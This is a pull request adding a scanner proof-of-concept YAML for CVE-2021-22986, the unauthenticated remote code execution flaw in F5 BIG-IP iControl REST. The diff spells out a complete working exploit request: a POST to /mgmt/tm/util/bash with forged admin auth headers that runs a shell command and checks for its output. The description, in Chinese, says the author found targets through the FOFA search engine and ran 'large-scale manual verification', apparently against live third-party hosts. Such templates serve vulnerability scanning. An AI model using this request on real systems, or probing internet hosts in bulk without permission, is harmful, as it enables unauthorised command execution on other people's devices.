### PR TITLE
Create cve-2021-22986.yml

### DIFF
--- a/pocs/cve-2021-22986.yml
+++ b/pocs/cve-2021-22986.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-cve-2021-22986
+rules:
+  - method: POST
+    path: /mgmt/tm/util/bash
+    headers:
+      Content-Type: application/json
+      Authorization: Basic YWRtaW46
+      X-F5-Auth-Token: " "
+    body: '{"command":"run","utilCmdArgs":"-c id"}'
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b'uid=')
+detail:
+  author: Hex
+  links:
+    - https://support.f5.com/csp/article/K03009991


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
cve-2021-22986 
F5 BIG-IP iControl 未授权远程代码执行漏洞

## 测试环境
fofa搜索

## 备注
![image](https://user-images.githubusercontent.com/35618366/111865226-b2a71880-89a0-11eb-9a2a-1f46db0ecfb8.png)

进行了大范围手动验证，POC正常运行
